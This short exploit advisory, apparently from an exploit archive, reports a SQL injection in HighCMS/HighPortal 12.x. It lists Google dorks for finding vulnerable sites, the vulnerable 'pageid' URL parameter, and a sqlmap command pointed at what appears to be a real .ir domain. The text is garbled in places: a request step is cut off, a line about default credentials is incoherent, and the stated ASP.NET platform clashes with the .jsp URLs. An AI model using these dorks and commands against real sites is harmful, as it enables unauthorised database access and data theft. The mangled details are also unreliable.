Headline
HighCMS/HighPortal 12.x SQL Injection
HighCMS/HighPortal version 12.x appears to suffer from a remote SQL injection vulnerability.
# Exploit Title: HighCMS/HighPortal v12.x SQL Inj# Type : WEBAPPS "HighCMS/HighPortal"# Platform : ASP.NET# Date : 4/23/2022# Exploit Author : E1.Coders# Software Link : https://aryanic.com/page/portal# Version : v12.x# Category : Webapps# Tested on: Linux/Windows# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid= # Google Dork: <©2022 HighCMS/HighPortal" Step 1: Enter the address of the "page" that has the problem of sql injection attacks http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials. ( is True )STEP 2 : Send the following request "orUse sqlmap : python sqlmap.py -u "https://example.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211"